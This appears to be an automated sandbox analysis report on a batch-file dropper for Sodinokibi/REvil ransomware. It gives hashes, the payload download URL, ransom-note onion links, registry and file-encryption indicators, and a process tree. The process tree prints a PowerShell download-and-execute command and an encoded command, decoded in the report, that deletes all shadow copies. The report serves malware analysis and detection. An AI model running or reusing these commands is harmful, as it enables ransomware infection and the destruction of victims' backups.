Analysis
max time kernel: 34s
max time network: 53s
platform: windows7_x64
resource: win7v200430
submitted: 19-05-2020 04:10

Static task: static1
Behavioral task: behavioral1 (sample a62c4733712a5a0ccf06aa73c58fd3fd.bat, resource win7v200430)
Behavioral task: behavioral2 (sample a62c4733712a5a0ccf06aa73c58fd3fd.bat, resource win10v200430)
General
Target: a62c4733712a5a0ccf06aa73c58fd3fd.bat
Size: 217B
MD5: 05f4de7667d23b9c8dac10fa03d7f205
SHA1: 8d0d899a76f6cd2d36311f8b8b7ef74bb495b1b0
SHA256: 28960164b3c1ec21a1ac053ccb4523a2b1dcbc9ee9404895f47be2de3f1aa2b0
SHA512: ff8867c98520dff41a1330cffbcfe235c25c3d6f561b87ee42cf670b13c5b296252b9e9dfc11d0a6362c0beb1ab9dceb91dca45451ed80a7f1494e2d77fcaefd
Malware Config
Extracted (download URL): http://185.103.242.78/pastes/a62c4733712a5a0ccf06aa73c58fd3fd
Extracted from C:\272h1-readme.txt (family: sodinokibi):
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6157148EFE54E3BB
  - http://decryptor.cc/6157148EFE54E3BB
Signatures

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  - Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3exgc9u9h.bmp" (powershell.exe)

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  - PID 784 powershell.exe

Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  - PID 784 powershell.exe and PID 1808 powershell.exe (77 hits in total; two from PID 1808, the rest from PID 784)

Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  - flow 2, PID 784 powershell.exe
Drops file in Program Files directory (28 IoCs)
Processes: powershell.exe
  - File opened for modification \??\c:\program files\ShowUnprotect.mov (powershell.exe)
  - File opened for modification \??\c:\program files\TestOut.vsx (powershell.exe)
  - File opened for modification \??\c:\program files\ResetUse.odt (powershell.exe)
  - File opened for modification \??\c:\program files\SelectReceive.jtx (powershell.exe)
  - File opened for modification \??\c:\program files\SkipEnable.pptm (powershell.exe)
  - File created \??\c:\program files\272h1-readme.txt (powershell.exe)
  - File opened for modification \??\c:\program files\CompareInstall.jpg (powershell.exe)
  - File opened for modification \??\c:\program files\RequestHide.xhtml (powershell.exe)
  - File opened for modification \??\c:\program files\SubmitDeny.ps1xml (powershell.exe)
  - File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\272h1-readme.txt (powershell.exe)
  - File opened for modification \??\c:\program files\CompleteSelect.mp4 (powershell.exe)
  - File opened for modification \??\c:\program files\DisableSplit.docm (powershell.exe)
  - File opened for modification \??\c:\program files\ResetSend.gif (powershell.exe)
  - File created \??\c:\program files (x86)\272h1-readme.txt (powershell.exe)
  - File opened for modification \??\c:\program files\StepMerge.nfo (powershell.exe)
  - File opened for modification \??\c:\program files\AddStep.vstx (powershell.exe)
  - File opened for modification \??\c:\program files\AddUse.xla (powershell.exe)
  - File opened for modification \??\c:\program files\EnterLimit.mhtml (powershell.exe)
  - File opened for modification \??\c:\program files\UseAssert.xlt (powershell.exe)
  - File opened for modification \??\c:\program files\BackupCopy.easmx (powershell.exe)
  - File created \??\c:\program files\microsoft sql server compact edition\272h1-readme.txt (powershell.exe)
  - File opened for modification \??\c:\program files\UnregisterWrite.js (powershell.exe)
  - File opened for modification \??\c:\program files\EnableStep.wmv (powershell.exe)
  - File opened for modification \??\c:\program files\UpdateSearch.MTS (powershell.exe)
  - File created \??\c:\program files\microsoft sql server compact edition\v3.5\272h1-readme.txt (powershell.exe)
  - File opened for modification \??\c:\program files\AssertRedo.dxf (powershell.exe)
  - File opened for modification \??\c:\program files\RepairStep.dwfx (powershell.exe)
  - File opened for modification \??\c:\program files\ResetSet.zip (powershell.exe)
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  - PID 676 cmd.exe wrote to memory of PID 784 powershell.exe
  - PID 784 powershell.exe wrote to memory of PID 1808 powershell.exe
  - PID 784 powershell.exe wrote to memory of PID 1808 powershell.exe
  - PID 784 powershell.exe wrote to memory of PID 1808 powershell.exe
  - PID 784 powershell.exe wrote to memory of PID 1808 powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 784 powershell.exe
  - Token: SeDebugPrivilege, PID 784 powershell.exe
  - Token: SeDebugPrivilege, PID 1808 powershell.exe
  - Token: SeBackupPrivilege, PID 652 vssvc.exe
  - Token: SeRestorePrivilege, PID 652 vssvc.exe
  - Token: SeAuditPrivilege, PID 652 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 784 powershell.exe

Enumerates connected drives (3 TTPs)
Processes

C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\a62c4733712a5a0ccf06aa73c58fd3fd.bat"
  PID: 676
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a62c4733712a5a0ccf06aa73c58fd3fd');Invoke-GDTHLNSAQQ;Start-Sleep -s 10000"
    PID: 784
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies, which is what the vssvc.exe activity and the VSS Diag registry writes above reflect)
      PID: 1808
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  PID: 652
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken